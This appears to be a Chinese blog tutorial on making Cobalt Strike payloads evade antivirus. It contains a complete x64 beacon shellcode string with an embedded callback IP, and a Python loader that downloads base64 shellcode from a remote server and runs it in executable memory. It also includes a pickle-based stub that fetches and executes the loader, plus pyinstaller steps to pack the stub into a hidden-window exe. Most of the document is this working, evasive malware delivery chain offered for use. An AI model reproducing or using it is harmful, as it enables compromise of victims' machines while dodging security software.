目录
0x00基础知识
1.Cobalt Strike简介
Cobalt Strike是一款功能强大的渗透工具,集成了端口转发、提权、凭据导出、服务扫描、文件捆绑、木马生成,钓鱼等多种功能。Cobalt Strike作为一款协同工具,主要用于团队作战,能让多个攻击者同时连接到团体服务器上,共享攻击资源与目标信息和sessions。
2.Shellcode介绍
简单翻译 ' shell代码 ',是Payload的一种,由于其建立正向/反向shell而得名
3.CS免杀操作
CS生成木马已经被各大杀毒软件加入病毒库,很容易被查杀,所以我们需进行一些免杀操作来绕过杀毒软件
0x01原理
shellcode和加载器(pyminifier混淆后)经base64编码后,放远程服务器备用,然后目标主机远程下载两次
1.shellcode
把shellcode进行BS64加密放在shellcode.txt里面并存放到服务器
"\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x99\x02\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x44\x55\x50\x74\x00\x3f\x70\x7a\xca\xf3\x0c\x7f\x50\xc0\x9f\x38\xf8\xd1\xc7\xb3\x5e\x8e\xfd\x0d\x14\x23\xb5\x5d\xdd\x1e\xe0\x6f\x4e\xf0\xa4\xa8\x23\xb4\x58\x66\x0b\x56\x43\x9a\x22\xd2\x7d\x33\x54\xa6\xb0\x44\xad\x86\x71\x6b\x78\x12\xf9\x3c\xe7\xe6\xc7\x18\x3b\x03\xbb\xe3\xae\x5a\x70\xbf\x0d\xdb\x91\xfe\x0a\xdb\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x37\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x35\x2e\x31\x3b\x20\x2e\x4e\x45\x54\x20\x43\x4c\x52\x20\x31\x2e\x31\x2e\x34\x33\x32\x32\x29\x0d\x0a\x00\x52\x38\xdf\xd4\x22\x5c\x04\x84\x12\x13\xbd\x69\x95\xf7\x3a\xbf\x7e\x0d\xa2\x32\xea\x7b\x6f\xd8\xbe\x09\x44\x22\x1b\x64\xfe\xde\xee\x76\x9b\xa9\x1c\x46\x21\x4d\xc2\xc6\xdf\x2a\x87\x1f\x14\xf3\xd4\xf5\x00\xab\xd3\xf9\x06\x4e\x5c\x16\x62\xb4\xc0\x68\x3c\x7f\x88\x69\xd8\xe7\x08\x83\xc1\x86\xae\xbc\x68\x37\x60\xec\x31\xc8\xc1\x15\x8d\xed\x72\x07\xc9\x9e\x42\x02\x7d\x44\xd6\x34\xae\x3f\x0d\x90\x47\x98\xc3\x16\x6c\x9e\x0f\x06\xdc\xa3\x2e\xdd\xde\xae\x6e\x27\xb1\x0f\x95\x96\x36\x44\x90\x52\x6f\x28\xee\x99\x85\xfb\xa9\x56\xe2\xa7\x9c\xf1\x1a\xda\xe1\x27\x3f\x81\xa4\xa4\x90\x3f\xc1\x53\xa6\x2c\xc3\x5a\x02\xb3\xa5\x28\xe5\xbe\x66\x82\xa4\xae\x95\x7c\x39\x1f\xfe\x72\x11\x86\xf8\xc3\xd0\xf9\x8c\x7c\xfb\x66\xc7\xdb\xef\x30\x34\x60\xdf\x8e\x67\x1b\xa2\x35\xad\xcb\x05\xc3\xaa\xe5\x99\x4a\xcd\x6a\x39\xfb\x7d\x8a\xe2\x92\xf0\xd7\x47\xa9\x96\xcf\xd8\xa0\x93\xd8\xf3\x45\x0d\xf3\xdf\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x32\x34\x2e\x32\x33\x33\x2e\x32\x36\x2e\x31\x33\x31\x00\x12\x34\x56\x78"2.加载器
修改加载器的服务器地址后进行一次BS64加密,然后把代码放在loader.txt里面并存放到服务器
import ctypes,urllib.request,codecs,base64
shellcode = urllib.request.urlopen('http://vps的ip地址/shellcode.txt').read()
shellcode = shellcode.strip()
shellcode = base64.b64decode(shellcode)
shellcode =codecs.escape_decode(shellcode)[0]
shellcode = bytearray(shellcode)
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
ctypes.c_uint64(ptr),
buf,
ctypes.c_int(len(shellcode))
)
handle = ctypes.windll.kernel32.CreateThread(
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_uint64(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0))
)
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))3.主程序
zhu.py,最终在目标上执行的exe文件
修改服务器地址后使用pyinstaller打包成exe可执行文件
import pickle
import ctypes,urllib.request,codecs,base64
sectr = urllib.request.urlopen('http://vps的ip地址/loader.txt').read()
sectr = base64.b64decode(sectr).decode("utf-8")
class A(object):
def __reduce__(self):
return (exec, (sectr,))
ret = pickle.dumps(A())
ret_base64 = base64.b64encode(ret)
ret_decode = base64.b64decode(ret_base64)
pickle.loads(ret_decode)
4.打包
pyinstaller -F -w zhu.py0x02测试
1.生成shellcode
1.1创建监听器
1.2生成shellcode
把双引号的内容进行一次BS64加密后放到shellcode.txt文件并放到服务器上
2.loader加载器处理
修改加载器的服务器地址后进行一次BS64加密,然后把代码放在loader.txt里面并存放到服务器 
上传上面两个文件到服务器
3.生成exe
将zhu.py中的url同理改为服务器地址,然后使用pyinstaller打包成exe 
0x03效果
微步威胁分析:
奇安信威胁分析:
1146
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
